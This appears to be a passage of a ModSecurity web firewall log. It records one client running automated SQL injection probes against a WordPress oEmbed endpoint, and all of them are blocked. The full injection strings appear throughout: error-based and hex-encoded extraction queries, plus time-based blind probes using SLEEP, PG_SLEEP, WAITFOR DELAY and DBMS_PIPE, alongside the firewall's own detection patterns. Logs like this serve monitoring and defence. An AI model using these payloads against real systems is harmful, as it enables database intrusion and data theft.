UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9780=9780) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)-- snDj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27B20MD5oChETZltkVZAAAAAM"] [Thu Aug 15 03:23:35.977545 2024] [:error] [pid 31519:tid 139653856315136] [client 141.98.81.52:57086] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:format: (SELECT 3452 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(3452=3452,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27B3xeJlWfH1pdny5XdgAAANE"] [Thu Aug 15 03:23:36.486325 2024] [:error] [pid 31337:tid 139653889885952] [client 141.98.81.52:57088] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:format: (SELECT CONCAT(0x7162626271,(SELECT (ELT(3656=3656,1))),0x7162707871))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27COwCyyCVFXh0DMS2lQAAAI0"] [Thu Aug 15 03:23:36.870289 2024] [:error] [pid 31336:tid 139653923456768] [client 141.98.81.52:57090] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: (SELECT (CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6609=6609) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27CEPAyXqJhbW53WyPXQAAAEk"] [Thu Aug 15 03:23:37.314636 2024] [:error] [pid 31519:tid 139653839529728] [client 141.98.81.52:57092] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CHAR( found within ARGS:format: (SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (5430=5430) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27CXxeJlWfH1pdny5XdwAAANM"] [Thu Aug 15 03:23:37.854439 2024] [:error] [pid 31337:tid 139653856315136] [client 141.98.81.52:57094] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml);SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27CewCyyCVFXh0DMS2lgAAAJE"] [Thu Aug 15 03:23:38.292905 2024] [:error] [pid 31337:tid 139653940242176] [client 141.98.81.52:57096] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml;SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27CuwCyyCVFXh0DMS2lwAAAIc"] [Thu Aug 15 03:23:38.625286 2024] [:error] [pid 31337:tid 139653797566208] [client 141.98.81.52:57098] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml');SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27CuwCyyCVFXh0DMS2mAAAAJg"] [Thu Aug 15 03:23:38.945303 2024] [:error] [pid 31519:tid 139653915064064] [client 141.98.81.52:57100] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27CnxeJlWfH1pdny5XeAAAAMo"] [Thu Aug 15 03:23:39.301307 2024] [:error] [pid 31336:tid 139653940242176] [client 141.98.81.52:57102] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml%';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27C0PAyXqJhbW53WyPXgAAAEc"] [Thu Aug 15 03:23:39.808925 2024] [:error] [pid 31336:tid 139653856315136] [client 141.98.81.52:57104] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml);SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27C0PAyXqJhbW53WyPXwAAAFE"] [Thu Aug 15 03:23:40.132356 2024] [:error] [pid 31336:tid 139654032893696] [client 141.98.81.52:57106] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml;SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27DEPAyXqJhbW53WyPYAAAAEQ"] [Thu Aug 15 03:23:40.469422 2024] [:error] [pid 31335:tid 139654066464512] [client 141.98.81.52:57108] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml');SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27DG0MD5oChETZltkVZQAAAAA"] [Thu Aug 15 03:23:40.784015 2024] [:error] [pid 31519:tid 139653881493248] [client 141.98.81.52:57110] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27DHxeJlWfH1pdny5XeQAAAM4"] [Thu Aug 15 03:23:41.296873 2024] [:error] [pid 31519:tid 139654066464512] [client 141.98.81.52:57112] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml%';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27DXxeJlWfH1pdny5XegAAAMA"] [Thu Aug 15 03:23:41.740037 2024] [:error] [pid 31337:tid 139653898278656] [client 141.98.81.52:57114] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml);WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27DewCyyCVFXh0DMS2mQAAAIw"] [Thu Aug 15 03:23:42.031906 2024] [:error] [pid 31337:tid 139653873100544] [client 141.98.81.52:57116] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml;WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27DuwCyyCVFXh0DMS2mgAAAI8"] [Thu Aug 15 03:23:42.478612 2024] [:error] [pid 31337:tid 139653906671360] [client 141.98.81.52:57118] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml');WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27DuwCyyCVFXh0DMS2mwAAAIs"] [Thu Aug 15 03:23:42.785254 2024] [:error] [pid 31337:tid 139653948634880] [client 141.98.81.52:57120] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27DuwCyyCVFXh0DMS2nAAAAIY"] [Thu Aug 15 03:23:43.230972 2024] [:error] [pid 31519:tid 139654024500992] [client 141.98.81.52:57122] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml%';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27D3xeJlWfH1pdny5XewAAAMU"] [Thu Aug 15 03:23:43.641279 2024] [:error] [pid 31337:tid 139653881493248] [client 141.98.81.52:57124] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(74)||CHR(100)||CHR(81),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27D-wCyyCVFXh0DMS2nQAAAI4"] [Thu Aug 15 03:23:44.061073 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:57126] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(74)||CHR(100)||CHR(81),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27EHxeJlWfH1pdny5XfAAAAMg"] [Thu Aug 15 03:23:44.439352 2024] [:error] [pid 31519:tid 139653923456768] [client 141.98.81.52:57128] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(74)||CHR(100)||CHR(81),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag 